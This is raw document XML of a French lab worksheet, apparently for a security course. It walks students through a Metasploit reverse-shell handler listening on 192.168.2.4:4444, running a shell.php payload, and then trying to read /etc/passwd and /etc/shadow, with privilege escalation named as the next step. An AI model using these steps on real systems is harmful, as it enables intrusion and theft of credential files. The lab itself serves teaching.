      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C9211E"/>
        </w:rPr>
        <w:t>set LHOST 192.168.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C9211E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="fr-FR"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="84" w:after="0"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C9211E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C9211E"/>
        </w:rPr>
        <w:t>run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ind w:left="846" w:right="803" w:hanging="454"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Exécutez le payload.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-52"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Avec Firefox, ouvrez le fichier shell.php que vous avez copié sur la machine GNU/Linux.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:ind w:left="845" w:right="782" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Quelle URL avez-vous utilisée ? Que se passe-t-il sur Metasploit ? </w:t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http://192.168.2.4:4444/</w:t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msf6 exploit(multi/handler) &gt; set LHOST 192.168.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
        </w:rPr>
        <w:t>4</w:t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LHOST =&gt; 192.168.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
        </w:rPr>
        <w:t>4</w:t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msf6 exploit(multi/handler) &gt; run</w:t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[-] Handler failed to bind to 192.168.2.23:4444:-  -</w:t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[*] Started reverse TCP handler on 0.0.0.0:4444 </w:t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[-] Command shell session 1 is not valid and will be closed</w:t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[*] 192.168.2.4 - Command shell session 1 closed.</w:t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[-] Command shell session 2 is not valid and will be closed</w:t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[*] 192.168.2.4 - Command shell session 2 closed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:ind w:right="782" w:hanging="0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TextBody"/>
        <w:spacing w:lineRule="auto" w:line="336"/>
        <w:ind w:left="845" w:right="782" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Pouvez-vous afficher </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>? /etc/shadow ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:lineRule="auto" w:line="336"/>
        <w:ind w:right="782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spacing w:before="2" w:after="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tapez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, quelles sont les commandes disponibles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"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5" w:leader="none"/>
          <w:tab w:val="left" w:pos="846" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="2" w:after="0"/>
        <w:ind w:left="846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5" w:leader="none"/>
          <w:tab w:val="left" w:pos="846" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="336"/>
        <w:ind w:left="846" w:right="4040" w:hanging="454"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Testez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>quel est l’OS de la machine GNU/Linux ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Comment avoir un shell GNU/Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"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5" w:leader="none"/>
          <w:tab w:val="left" w:pos="846" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="336"/>
        <w:ind w:left="846" w:right="4040" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="2" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Pouvez-vous créer un fichier ? Pourquoi ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="2" w:after="0"/>
        <w:ind w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="2" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="2" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>La phase logique suivante consiste à faire une « escalade de privilège » et devenir root …</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId2"/>
      <w:footerReference w:type="default" r:id="rId3"/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:left="460" w:right="460" w:header="631" w:top="1180" w:footer="633" w:bottom="8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aco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360680</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>10113645</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="4801235" cy="1270"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="6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060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.4pt,796.35pt" to="406.35pt,796.35pt" ID="Image4" stroked="t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6974840</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>387985</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="227965" cy="16827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16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6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549.2pt;margin-top:30.55pt;width:17.85pt;height:13.1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60" w:hanging="0"/>
                      <w:rPr>
                        <w:i/>
                        <w:i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  <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>/4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482" w:hanging="372"/>
      </w:pPr>
      <w:rPr>
        <w:sz w:val="28"/>
        <w:spacing w:val="-3"/>
        <w:b/>
        <w:szCs w:val="28"/>
        <w:bCs/>
        <w:w w:val="100"/>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="fr-FR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46" w:hanging="454"/>
      </w:pPr>
      <w:rPr>
        <w:sz w:val="24"/>
        <w:spacing w:val="-17"/>
        <w:szCs w:val="24"/>
        <w:w w:val="100"/>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="fr-FR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67" w:hanging="45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4" w:hanging="45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2" w:hanging="45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9" w:hanging="45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76" w:hanging="45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04" w:hanging="45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31" w:hanging="45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fr-FR" w:bidi="fr-FR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="482" w:hanging="37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30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367d25"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="fr-FR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367d25"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi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846" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs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ontents1">
    <w:name w:val="TOC 1"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="114" w:after="0"/>
      <w:ind w:left="467" w:hanging="35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14" w:after="0"/>
      <w:ind w:left="846" w:hanging="454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367d25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367d25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LibreOffice/7.0.4.2$Linux_X86_64 LibreOffice_project/00$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>7</Pages>
  <Words>1557</Words>
  <Characters>10411</Characters>
  <CharactersWithSpaces>13047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2023-09-23T14:45:00Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>fr-FR</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-04T15:54:03Z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2023-03-01T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>